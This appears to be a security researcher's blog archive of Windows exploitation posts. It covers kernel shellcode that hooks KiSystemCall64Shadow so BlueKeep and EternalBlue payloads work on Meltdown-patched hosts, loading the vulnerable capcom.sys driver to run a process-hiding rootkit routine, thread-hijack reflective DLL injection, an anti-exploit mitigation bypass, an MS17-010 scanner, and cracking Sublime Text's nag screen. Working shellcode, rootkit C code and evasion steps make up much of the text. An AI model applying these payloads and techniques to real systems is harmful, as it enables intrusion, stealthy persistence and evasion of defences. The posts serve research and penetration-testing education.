zerosum0x0

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

8 November 2019 at 07:03

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode

- Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently break the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors load, evaluate, and branch ("speculate") well before these operations are "actually" due to run. This can cause effects that are measurable through side channels such as cache timing attacks. Through some clever engineering, Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

  1. Swap to kernel GS segment
  2. Save user stack to KPCR->Prcb.UserRspShadow
  3. Check if KPCR->Prcb.ShadowFlags first bit is set
  • Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
  • Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

    NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

    Existing Remote Kernel Payloads

    The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

    Hooking IA32_LSTAR MSR

    In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

    To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

    One of the easiest, hackiest, and KPP-detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc0000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

    User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

    Double Fault Root Cause Analysis

    Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with an UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

    We can see that at this point, user mode can see the KiSystemCall64Shadow function:

    However, user mode cannot see our shellcode location:

    The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

    Hooking KiSystemCall64Shadow

    So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

    Heuristic Offset Detection

    We want to accomplish two things:

    1. Install our hook in a spot after kernel pages CR3 is loaded.
    2. Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

    For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2-bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

    The following shellcode is the 0th stage that runs after exploitation:

    payload_start:
    ; read IA32_LSTAR
        mov ecx, 0xc0000082         
        rdmsr
    
        shl rdx, 0x20
        or rax, rdx                 
        push rax
    
    ; rsi = &KiSystemCall64Shadow
        pop rsi                      
    
    ; this loop stores the offset to push 2b into ecx
    _find_push2b_start:
        xor ecx, ecx
        mov ebx, 0x652b6a00
    
    _find_push2b_loop:
        inc ecx
        cmp ebx, dword [rsi + rcx - 1]
        jne _find_push2b_loop
    

    This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.
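As a rough illustration, the scan loop above can be modeled in portable C over an ordinary byte buffer. This is only a sketch: the function name `find_push2b` and the explicit length bound are assumptions added for the example (the shellcode loop itself has no bound and simply walks forward from the syscall entry).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical user-mode model of the push 2b scan.
 * Looks for the bytes 00 6a 2b 65 (the dword 0x652b6a00 in little endian)
 * and returns the offset of the 6a 2b (push 0x2b) inside `code`,
 * or -1 if the pattern is not present within `len` bytes.
 */
long find_push2b(const uint8_t *code, size_t len)
{
    static const uint8_t pattern[4] = { 0x00, 0x6a, 0x2b, 0x65 };

    for (size_t i = 0; i + sizeof(pattern) <= len; i++) {
        if (memcmp(code + i, pattern, sizeof(pattern)) == 0) {
            /* skip the stable preceding 00 byte to land on push 2b */
            return (long)(i + 1);
        }
    }
    return -1;
}
```

The returned value plays the role of ecx in the shellcode: the pattern starts one byte before the push, so the match index plus one is the offset of the instruction to overwrite.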

    The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

    Atomic x64 Function Hooking

    It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b instruction!

    Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

    We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

    ; install hook call in KiSystemCall64Shadow NOP padding
    install_big_jmp:
    
    ; 0xbf485790 (bytes 90 57 48 bf) = nop; push rdi; movabs rdi, &fake_syscall_hook;
        mov dword [rsi - 0x10], 0xbf485790 
        lea rdi, [rel fake_syscall_hook]
        mov qword [rsi - 0xc], rdi
    
    ; 0xc357 (bytes 57 c3) = push rdi; ret;
        mov word [rsi - 0x4], 0xc357
    
    ; ... 
    
    fake_syscall_hook:
    
    ; ...
    
    

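To make the byte layout of the BIG JMP gadget easier to check, here is a small C sketch that builds the same 14 bytes into a buffer. The helper name `encode_big_jmp` and the `BIG_JMP_SIZE` constant are made up for this example; the opcodes are the ones written by install_big_jmp above.

```c
#include <assert.h>
#include <stdint.h>

#define BIG_JMP_SIZE 14 /* occupies [entry - 0x10, entry - 0x3] in the NOP padding */

/*
 * Hypothetical helper: encodes
 *     nop; push rdi; movabs rdi, target; push rdi; ret
 * exactly as the three stores in install_big_jmp lay it out.
 */
void encode_big_jmp(uint8_t out[BIG_JMP_SIZE], uint64_t target)
{
    out[0] = 0x90; /* nop */
    out[1] = 0x57; /* push rdi (saves the original rdi on the stack) */
    out[2] = 0x48; /* REX.W prefix */
    out[3] = 0xbf; /* mov rdi, imm64 */

    /* imm64 is stored little endian */
    for (int i = 0; i < 8; i++) {
        out[4 + i] = (uint8_t)(target >> (8 * i));
    }

    out[12] = 0x57; /* push rdi (pushes the hook address) */
    out[13] = 0xc3; /* ret (jumps to the hook address) */
}
```

Read as a little-endian dword, the first four bytes are 0xbf485790, and the last two read as the word 0xc357, which is why the constants in the assembly look reversed relative to the instruction order.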
    Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

    Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

    ; install tiny jmp to the NOP padding jmp
    install_small_jmp:
    
    ; rsi = &syscall+push2b
        add rsi, rcx
    
    ; eax = jmp -x
    ; fix -x to actual offset required
        mov eax, 0xfeeb
        shl ecx, 0x8
        sub eax, ecx
        sub eax, 0x1000
    
    ; push 2b => jmp -x;
        mov word [rsi], ax        
    

    And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

    On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will goto big jmp which will goto our fake syscall handler at PASSIVE_LEVEL.
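The displacement arithmetic in install_small_jmp can be sanity-checked with a few lines of C. This is a sketch under assumptions: the function names are invented for the example, and the 0x15 offset used in the usage note is a made-up value rather than one taken from a real kernel.

```c
#include <assert.h>
#include <stdint.h>

#define BIG_JMP_OFFSET 0x10u /* big jmp gadget starts 0x10 bytes before the syscall entry */

/* Mirrors the shellcode: start from eb fe (jmp to self) and adjust the rel8 byte. */
uint16_t small_jmp_word(uint32_t push2b_offset)
{
    uint32_t eax = 0xfeebu;        /* bytes eb fe = jmp -2 */
    eax -= push2b_offset << 8;     /* shl ecx, 8; sub eax, ecx */
    eax -= BIG_JMP_OFFSET << 8;    /* sub eax, 0x1000 */
    return (uint16_t)eax;
}

/* Where the short jmp lands, as a signed offset relative to the syscall entry. */
int32_t small_jmp_target(uint32_t push2b_offset)
{
    uint32_t hi = small_jmp_word(push2b_offset) >> 8;
    int32_t rel8 = (hi & 0x80u) ? (int32_t)hi - 256 : (int32_t)hi;

    /* a short jmp is 2 bytes long and is relative to the next instruction */
    return (int32_t)push2b_offset + 2 + rel8;
}

/* rel8 only reaches 128 bytes backwards, so the offset has an upper limit. */
int small_jmp_in_range(uint32_t push2b_offset)
{
    return push2b_offset + 2 + BIG_JMP_OFFSET <= 128;
}
```

For a hypothetical offset of 0x15, `small_jmp_word` yields 0xd9eb (bytes eb d9), which lands at entry - 0x10, the first byte of the big jmp gadget. The range check also shows a limit of this trick: it only works while push 2b sits within 110 bytes of the syscall entry.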

    Cleaning Up the Hook

    Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

    ; this syscall hook is called AFTER kernel stack+KVA shadow is setup
    fake_syscall_hook:
    
    ; save all volatile registers
        push rax
        push rbp
        push rcx
        push rdx
        push r8
        push r9
        push r10
        push r11
    
        mov rbp, STAGE_SHARED_MEM
    
    ; use lock cmpxchg for queueing APC only one at a time
    single_thread_gate:
        xor eax, eax
        mov dl, 1
        lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
        jnz _restore_syscall
    
    ; only 1 thread has this lock
    ; allow interrupts while executing ring0 to ring3
        sti
        call r0_to_r3
        cli
    
    ; all threads can clean up
    _restore_syscall:
    
    ; calculate offset to 0x2b using shared storage
        mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
        mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
        add rdi, rax
    
    ; atomic change small jmp to push 2b
        mov word [rdi], 0x2b6a
    

    All threads restore the push 2b, as the code flow results in fewer bytes, no extra locking, and shouldn't matter.
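The single_thread_gate logic maps closely onto a C11 compare-and-swap. The following is a minimal user-mode sketch, assuming a hypothetical helper named `try_enter_gate`; it is not kernel code, it only shows the "first caller wins" behaviour of lock cmpxchg with an expected value of 0 and a new value of 1.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>

/*
 * Hypothetical model of the gate: returns true for exactly one caller.
 * Equivalent in spirit to:
 *     xor eax, eax
 *     mov dl, 1
 *     lock cmpxchg byte [lock], dl   ; ZF=1 only if the byte was 0
 */
bool try_enter_gate(atomic_uchar *lock)
{
    unsigned char expected = 0;
    return atomic_compare_exchange_strong(lock, &expected, 1);
}
```

Only the caller that flips the byte from 0 to 1 goes on to queue the APC; every later caller sees a failed exchange and falls through to the restore path, just like the jnz _restore_syscall branch.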

    Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

    _syscall_hook_done:
    
    ; restore register values
        pop r11
        pop r10
        pop r9
        pop r8
        pop rdx
        pop rcx
        pop rbp
        pop rax
    
    ; rdi still holds push2b offset!
    ; but needs to be restored
    
    ; do not cause bugcheck 0xc4 arg1=0x91
        mov qword [rsp-0x20], rdi
        pop rdi
    
    ; return to &KiSystemCall64Shadow+push2b
        jmp [rsp-0x28]
    

    You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

    Conclusion

    Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

    It's simple, it's obvious, it's hacky; but it works and so it's what you want.

    Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

    2 July 2017 at 03:35

    Update July 3, 2017: FuzzySec has also previously written some info about this.

    Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings, and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

    Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

    But why waste 0-days when you can use kn0wn-days?

    Premise

    1. If you're running as an elevated admin, you're allowed to load (signed) drivers.
      • Local users are almost always admins.
      • UAC is known to be fundamentally broken.
    2. Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
      • It's a fairly obvious idea, and elementary to perform.
      • Windows does not have robust certificate revocation.
        • Thus, the DSE trust model is fundamentally broken!

    Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

    This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

    That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

    oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe

    - slipstream/RoL (@TheWack0lian) September 23, 2016

    Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

    The unfortunate part is it can still be easily loaded and exploited to this day.

    My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.

    - Matt Graeber (@mattifestation) June 24, 2017

    If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seem bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

    Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

    While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

    Proof of Concept

    Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

    Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

    1: kd> dt !_EPROCESS ActiveProcessLinks
       +0x2e8 ActiveProcessLinks : _LIST_ENTRY

    For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple, doing something interesting once there is more difficult (e.g. we can already load drivers, the usual SYSTEM shell can be obtained through less dangerous methods).

    I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

    static void rootkit_unlink(PEPROCESS pProcess)
    {
     static const DWORD WIN10_RS3_OFFSET = 0x2e8;
    
     PLIST_ENTRY plist = 
      (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);
    
     *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
     *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;
    
     plist->Flink = (PLIST_ENTRY) &(plist->Flink);
     plist->Blink = (PLIST_ENTRY) &(plist->Flink);
    }
    

    Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.
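The pointer surgery in rootkit_unlink is ordinary doubly-linked list removal, and its effect on anything that walks the list can be seen in a toy user-mode model. Everything in this sketch (`list_entry`, `toy_process`, the helper names, and the PIDs in the usage note) is hypothetical and stands in for LIST_ENTRY and EPROCESS; it does not touch any real kernel structure.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-ins for LIST_ENTRY and a process object that embeds one. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

typedef struct toy_process {
    int pid;
    list_entry links;
} toy_process;

void list_init(list_entry *head)
{
    head->flink = head->blink = head;
}

void list_insert_tail(list_entry *head, list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Same four pointer writes as rootkit_unlink: bypass the entry, then self-link it. */
void list_unlink_self(list_entry *e)
{
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    e->flink = e;
    e->blink = e;
}

/* Walks the list the way an enumeration tool would, recovering the owner by offset. */
int list_contains_pid(const list_entry *head, int pid)
{
    for (const list_entry *e = head->flink; e != head; e = e->flink) {
        const toy_process *p =
            (const toy_process *)((const char *)e - offsetof(toy_process, links));
        if (p->pid == pid) {
            return 1;
        }
    }
    return 0;
}
```

After `list_unlink_self`, a walk from the list head no longer reaches the removed entry, while the entry's own links point back at itself so that a later removal of it does not corrupt its former neighbors.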

    DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()

    1 July 2017 at 07:52

    In the attempt to evade AV, attackers go to great lengths to avoid the common reflective injection code execution function, CreateRemoteThread(). Alternative techniques include native API (ntdll) thread creation and user APCs (necessary for SysWow64->x64), etc.

    This technique uses SetThreadContext() to change a selected thread's registers, and performs a restoration process with NtContinue(). This means the hijacked thread can keep doing whatever it was doing, which may be a critical function of the injected application.

    You'll notice the PoC (x64 only, #lazy) is using the common VirtualAllocEx() and WriteVirtualMemory() functions. But instead of creating a new remote thread, we piggyback off of an existing one, and restore the original context when we're done with it. This can be done locally (current process) and remotely (target process).

    Stage 0: Thread Hijack

    Code can be found in hijack/hijack.c

    1. Select a target PID.
    2. Process is opened, and any thread is found.
    3. Thread is suspended, and thread context (CPU registers) copied.
    4. Memory allocated in remote process for reflective DLL.
    5. Memory allocated in remote process for thread context.
    6. Set the thread context stack pointer to a lower address.
    7. Change thread context with SetThreadContext().
    8. Resume the thread execution.

    Stage 1: Reflective Restore

    Code can be found in dll/ReflectiveDll.c

    1. Normal reflective DLL injection takes place.
    2. Optional: Spawn new thread locally for a primary payload.
    3. Optional: Thread is restored with NtContinue(), using the passed-in previous context.

    You can go from x64->SysWow64 using Wow64SetThreadContext(), but not the other way around. I unfortunately did not observe possible sorcery for SysWow64->x64.

    One major hiccup to overcome, in x64 mode, is that the register RCX (function param 1) is volatile even across a SetThreadContext() call. To overcome this, I stored the CONTEXT pointer in a cave (in this case, the DOS header). Luckily, NtContinue() allows setting the volatile registers, so there are no issues in the restoration process; otherwise it would have needed a hacky code cave inserted or something.

        // retrieve CONTEXT from DOS header cave
        lpParameter = (LPVOID)*((PULONG_PTR)((LPBYTE)uiLibraryAddress+2));
    

    Another issue is we could corrupt the original thread's stack. I subtracted 0x2000 from RSP to find a new spot to spam up.

    I've seen similar (but non-successful) techniques for code injection, though I found only a small amount of similar information [1] [2]. These techniques were not interested in performing proper cleanup of the stolen thread, which is not practical in many circumstances. This is essentially the same process that RtlRemoteCall() follows. As such, there may be issues for threads in a wait state returning an incorrect status? None of these sources uses reflective restoration.

    As user mode API is highly explored territory, this may not be an original technique. If so, take the example for what it is ([relatively] clean code with academic explanation) and chalk it up to multiple discovery. Leave flames, spam, and questions in the comments!

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection

    1 July 2017 at 07:01

    Windows 10 Redstone 3 (Fall Creators Update) is adding Exploit Guard, bringing EMET's Export Address Table Access Filtering (EAF) mitigation, among others, to the system. We are still living in a golden era of Windows exploitation and post-exploitation, compared to the way things will be once the world moves onto Windows 10. This is a mitigation that will need to be bypassed sooner or later.

    EAF sets hardware breakpoints that check for legitimate access when the function exports of KERNEL32.DLL and NTDLL.DLL are read. It does this by checking if the offending caller code is part of a legitimately loaded module (which reflective DLL injection is not). EAF+ adds another breakpoint for KERNELBASE.DLL. One bypass was searching a DLL such as USER32.DLL for its imports, however Windows 10 will also be adding the brand new Import Address Table Access Filtering (IAF).

    So how can we avoid the EAF exploit mitigation? Simple: reflective DLLs, just like normal DLLs, take an LPVOID lpParam. Currently, the loader code does nothing with this besides forwarding it to DllMain. We can allocate and pass a pointer to this struct.

    #pragma pack(1)
    typedef struct _REFLECTIVE_LOADER_INFO
    {
    
        LPVOID  lpRealParam;
        LPVOID  lpDosHeader;
        FARPROC fLoadLibraryA;
        FARPROC fGetProcAddress;
        FARPROC fVirtualAlloc;
        FARPROC fNtFlushInstructionCache;
        FARPROC fVirtualLock;
    
    } REFLECTIVE_LOADER_INFO, *PREFLECTIVE_LOADER_INFO;
    

    Instead of performing two allocations, we could also shove this information in a code cave at start of the ReflectiveLoader(), or in the DOS headers. I don't think DOS headers are viable for Metasploit, which inserts shellcode there (that does some MSF setup and jumps to ReflectiveLoader(), so you can start execution at offset 0), but perhaps in the stub between the DOS->e_lfanew field and the NT headers.

    Reflective DLLs search backwards in memory for their base MZ DOS header address, requiring a second function with the _ReturnAddress() intrinsic. We know this information and can avoid the entire process (note: method not possible if we shove in DOS headers).

    Likewise, the addresses for the APIs we need are also known information before the reflective loader is called. While it's true that there is full ASLR for most loaded DLL modules these days, KERNEL32.DLL and NTDLL.DLL are only randomized upon system boot. Unless we do something weird, the addresses we see in the injecting process will be the same as in the injected process.

    In order to get code execution to the point of being able to inject code in another process, you need to be inside of a valid context or previously have necessary function pointers anyways. Since EAF does not alert from a valid context, obtaining pointers in the first place should not be an issue. From there, chaining this method with migration is not a problem.

    This kind of removes some of the novelty from reflective DLL injection. It's known that instead of self-loading, it's possible to perform the loader code from the injector (this method is seen in powerkatz.dll [PowerShell Empire's Mimikatz] and process hollowing). However, recently there was a circumstance where I was forced to use reflective injection due to the constraints I was working within. More on that at a later time, but reflective DLL injection, even with this extra step, still has plenty of uses and is highly coupled to the tools we're currently using... This is a simple fix when the issue comes up.

    MS17-010 (SMB RCE) Metasploit Scanner Detection Module

    19 April 2017 at 03:28

    Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

    During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen. Microsoft's official response says these exploits were fixed up in MS17-010, released in mid-March.

    Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu, of Rapid7 (and whom coincidentally I met in person the day of the leak), added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect if the patch is missing or not.

    Module Information Page
    https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

    Module Source Code
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

    My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).
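The decision logic described above boils down to a three-way mapping from the returned NTSTATUS to a verdict. The following C sketch only illustrates that mapping; the real module is written in Ruby, and the enum and function names here are hypothetical. The numeric values are the standard NTSTATUS codes for the three names.

```c
#include <assert.h>
#include <stdint.h>

/* Standard NTSTATUS values for the statuses named in the text. */
#define STATUS_INVALID_HANDLE          0xC0000008u
#define STATUS_ACCESS_DENIED           0xC0000022u
#define STATUS_INSUFF_SERVER_RESOURCES 0xC0000205u

typedef enum {
    MS17_010_VULNERABLE, /* patch missing */
    MS17_010_PATCHED,    /* patch appears to be installed */
    MS17_010_UNKNOWN     /* status not recognized, patch level undetermined */
} ms17_010_verdict;

/* Hypothetical helper: classify the status of the PeekNamedPipe transaction on FID 0. */
ms17_010_verdict classify_peek_status(uint32_t nt_status)
{
    switch (nt_status) {
    case STATUS_INSUFF_SERVER_RESOURCES:
        return MS17_010_VULNERABLE;
    case STATUS_ACCESS_DENIED:   /* Win10 after the patch */
    case STATUS_INVALID_HANDLE:  /* other Windows versions after the patch */
        return MS17_010_PATCHED;
    default:
        return MS17_010_UNKNOWN;
    }
}
```

Keeping an explicit "unknown" result matches the module's behaviour of reporting that it could not determine the patch level rather than guessing.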

    IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be run as an unauthed scan, as it can log on as the user "\" and connect to IPC$.

    This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

    These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

    I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

    Removing Sublime Text Nag Window

    8 September 2016 at 15:08
    I contemplated releasing this blog post earlier, and now that everyone has moved on from Sublime Text to Atom there's really no reason not to push it out. This is posted purely for educational purposes.

    Everyone who has used the free version of Sublime Text knows that when you go to save a file, it will randomly show a popup asking you to buy the software. This is known as a "nag window".



    The first time I saw it, I knew it had to be cracked. Just pop open the sublime_text.exe file in IDA Pro and search for the string.



    We find a match, and IDA tells us where it is cross referenced.



    We open the function that uses these .rdata bytes and see that it checks some globals, and performs a call to rand(). If any of the checks fail it will display the popup. The function itself is only about 20 lines of pretty basic assembly but we decompile it anyway because the screenshot is cooler that way.



